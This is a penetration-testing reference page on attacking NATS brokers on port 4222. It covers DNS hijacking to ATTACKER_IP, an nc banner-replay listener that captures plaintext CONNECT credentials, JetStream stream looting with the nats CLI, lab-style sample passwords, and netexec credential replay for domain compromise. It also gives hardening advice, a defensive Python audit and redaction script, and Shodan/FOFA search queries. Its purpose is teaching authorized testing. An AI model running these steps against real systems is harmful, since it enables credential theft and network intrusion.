4222 - Nats

💡 Learning tip: This document describes penetration-testing techniques for 4222 - NATS and is intended as a reference for information security beginners and practitioners.

⚠️ Legal notice: This document is for learning and authorized testing only. Testing systems without authorization may violate laws and regulations.


update add nats-svc.domain.local 60 A ATTACKER_IP send

  • Mirror the legitimate banner once, then replay it to every connecting client. NATS clients trust the first `INFO` line they receive, so the banner only needs to be piped through a listener:

```bash
nc REAL_NATS 4222 | head -1 | nc -lnvp 4222
```

  • As soon as an internal client resolves the hijacked name, it emits a plaintext `CONNECT` frame containing the user / pass pair and assorted telemetry (client name, Go version, protocol level). Because nothing beyond the `INFO` banner is required, even `nc` is enough to harvest secrets.
  • For longer engagements, run the official server locally (`git clone https://github.com/nats-io/nats-server && go build && ./nats-server -V`). TRACE logging already shows usernames; removing the redaction helper or sniffing the traffic with Wireshark reveals the full password.

JetStream looting & password hunting

Once any credential is recovered (e.g. Dev_Account_A), store it as a CLI context to avoid retyping:

```bash
nats context add mirage -s nats://dc01.mirage.htb --user Dev_Account_A --password 'hx5h7F5554fP@1337!'
```

JetStream discovery usually follows this pattern:

```bash
nats account info --context mirage      # quotas, stream count, expiration
nats stream list --context mirage       # names + message totals
nats stream info auth_logs --context mirage
nats stream view auth_logs --context mirage
```

Streaming teams frequently log authentication events into subjects such as logs.auth. If developers persist the raw JSON into a JetStream stream, the payloads may include plaintext AD usernames and passwords:

```json
{"user":"david.jjackson","password":"pN8kQmn6b86!1234@","ip":"10.10.10.20"}
```

Retained secrets can then be replayed against Kerberos-only services using netexec smb DC01 -u USER -p PASS -k, enabling full domain compromise.

Hardening & detection

  • Enforce TLS (tls, tls_required, or mTLS via nkey/creds). Without encryption, INFO/CONNECT leaks credentials to anyone on-path.
  • Pinpoint who can update DNS – delegate service records to dedicated accounts and audit Event IDs 257/252 for high-value hostnames. Combine with scavenging alerts so missing broker names cannot be silently re-claimed.
  • Disable credential logging. Scrub secrets before publishing to subjects, set JetStream retention/age limits, and apply deny_delete=false only to trusted operators.
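As an added illustration of the detection and logging points above (example code, not part of the original page or the NATS project), the following Python audits a captured NATS session for the `INFO`/`CONNECT` exposure described earlier and shows the kind of redaction a logger or publisher should apply before a frame or a `logs.auth` payload is persisted. The capture and the credential in it are constructed; `SECRET_KEYS` is an assumed list of field names.

```python
import json
import re

# NATS control lines are CRLF-terminated; INFO (server) and CONNECT (client) carry one JSON object.
_FRAME_RE = re.compile(r"^(INFO|CONNECT)\s+(\{.*\})$")
SECRET_KEYS = {"pass", "password", "auth_token", "token", "secret"}  # assumed: never log or persist

def parse_frames(capture: str) -> list:
    """Extract INFO/CONNECT frames from a raw session; other verbs (PING, PUB, ...) are skipped."""
    frames = []
    for line in capture.split("\r\n"):
        m = _FRAME_RE.match(line.strip())
        if m:
            try:
                frames.append({"op": m.group(1), "body": json.loads(m.group(2))})
            except json.JSONDecodeError:
                pass  # malformed JSON: a real client would reject this frame too
    return frames

def audit_session(capture: str) -> list:
    """Flag a server that does not require TLS and any credentials the client then sends in the clear."""
    findings, tls_required = [], None
    for frame in parse_frames(capture):
        body = frame["body"]
        if frame["op"] == "INFO":
            tls_required = bool(body.get("tls_required", False))
            if not tls_required:
                findings.append("INFO: tls_required is false, CONNECT will travel in plaintext")
        elif frame["op"] == "CONNECT" and not tls_required:  # no INFO seen counts as cleartext too
            exposed = sorted(k for k in body if k in SECRET_KEYS or k == "user")
            if exposed:
                findings.append(f"CONNECT: plaintext fields {exposed} for user={body.get('user')!r}")
    return findings

def redact(obj):
    """Mask secret-bearing fields recursively so frames or stream payloads can be logged safely."""
    if isinstance(obj, dict):
        return {k: "[REDACTED]" if k.lower() in SECRET_KEYS else redact(v) for k, v in obj.items()}
    if isinstance(obj, list):
        return [redact(v) for v in obj]
    return obj

# Constructed capture of a cleartext handshake (not from a real server or client).
SAMPLE_CAPTURE = (
    'INFO {"server_id":"NEXAMPLE","version":"2.10.0","go":"go1.21","port":4222,'
    '"tls_required":false,"auth_required":true}\r\n'
    'CONNECT {"verbose":false,"user":"svc_nats","pass":"Example-Pass-1","name":"billing",'
    '"lang":"go","version":"1.30.0","protocol":1}\r\nPING\r\nPONG\r\n'
)
```

Run `audit_session(SAMPLE_CAPTURE)` to get the two findings, and `redact(...)` on the parsed `CONNECT` body or on a `logs.auth` JSON payload before it reaches a log line or a JetStream publish.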

Search engine syntax

FOFA

```
# FOFA search syntax
port="4222"
```

Shodan

```
# Shodan search syntax
port:4222
```

ZoomEye

```
# ZoomEye search syntax
port:4222
```

📖 References